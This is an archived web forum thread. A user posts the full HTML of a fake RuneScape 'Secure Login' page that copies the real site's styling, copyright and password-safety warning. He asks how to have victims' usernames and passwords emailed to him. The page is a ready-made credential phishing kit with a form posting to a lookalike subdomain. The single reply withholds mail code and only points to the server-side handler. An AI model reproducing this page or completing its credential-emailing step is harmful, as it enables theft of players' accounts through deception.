Help - Search - Members - Calendar
Full Version: Need Help- Emailing With HTML
HTMLHelp Forums > Web Authoring > Markup (HTML, XHTML, XML)
whatthephil
I want to the username and password to be sent to my email in this script:




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:IE>
<head>
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="MSSmartTagsPreventParsing" content="TRUE">
<title>RuneScape - the massive online adventure game by Jagex Ltd</title>
<link href="http://www.runescape.com/css/basic-1.css" rel="stylesheet" type="text/css" media="all">

<link href="http://www.runescape.com/css/extra-1.css" rel="stylesheet" type="text/css" media="all">
</head>
<body>

<div id="body">
<div style="text-align: center; background: none;">

<div class="titleframe e">
<b>Secure Login</b><br>
<a href="http://www.runescape.com/title.ws">Main Menu</a>
</div>
</div>
<br>
<div class="frame wide_e">
<table width="100%">
<tr>
<td align="center" colspan="3">
<div style="color:#FFBB22;">
<b>You need to log in to access this feature</b>
</div>
<br>

<div style="text-align:center">
Never enter your password anywhere except <b>RuneScape.com</b><br>
<img src="http://www.runescape.com/img/weblogin/onlyrs4.gif">
</div>
<form action="https://password_history.runescape.com/login.ws" method="post" autocomplete="off">
<table>
<tr>
<td>RuneScape username:</td>
<td><input size="20" type="text" name="username" maxlength="12"></td>
</tr>
<tr>
<td>RuneScape password:</td>
<td><input size="20" type="password" name="password" maxlength="20"></td>

</tr>
<tr>
<td></td>
<td align="center"><input type="submit" value="Secure Login" style="background:#4D422E url('http://www.runescape.com/img/brownback.jpg'); color: white;" class="b"></td>
</tr>
</table>
<input type="hidden" name="dest" value="passchange.html">
</form>
</td>
</tr>
<tr>
<td align="right">
<table width=220 bgcolor=black cellpadding=4>
<tr>
<td class="b" bgcolor="#4D422E" background="http://www.runescape.com/img/brownback.jpg" align="center">
<b>Need an account?</b><br>

To create an account to access our game and secure services,
<a href="https://create.runescape.com/index.html" class=c>Click Here</a>
</td>
</tr>
</table>
</td>
<td width=20>&nbsp;</td>
<td align="left">
<table width=220 bgcolor=black cellpadding=4>
<tr>
<td class="b" bgcolor="#4D422E" background="http://www.runescape.com/img/brownback.jpg" align="center">
<b>Lost password?</b><br>
If you have lost/forgotten your password or need to recover your account,
<a href="https://password.runescape.com/passsupport.html" class=c>Click Here</a>

</td>
</tr>
</table>
</td>
</tr>
</table>
</div>
<br>
<div class="tandc">This website and its contents are copyright © 1999 - 2007 Jagex Ltd.<br>
Use of this website is subject to our <a href="http://www.runescape.com/terms/terms.ws" class=c>Terms+Conditions</a>
and <a href="http://www.runescape.com/privacy/privacy.ws" class=c>Privacy policy</a>
</div>

</div>

</body>
</html>


What code do I use to send the email and where do I put it?
Darin McGrew
You need to update password_history.runescape.com/login.ws to send email.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2010 Invision Power Services, Inc.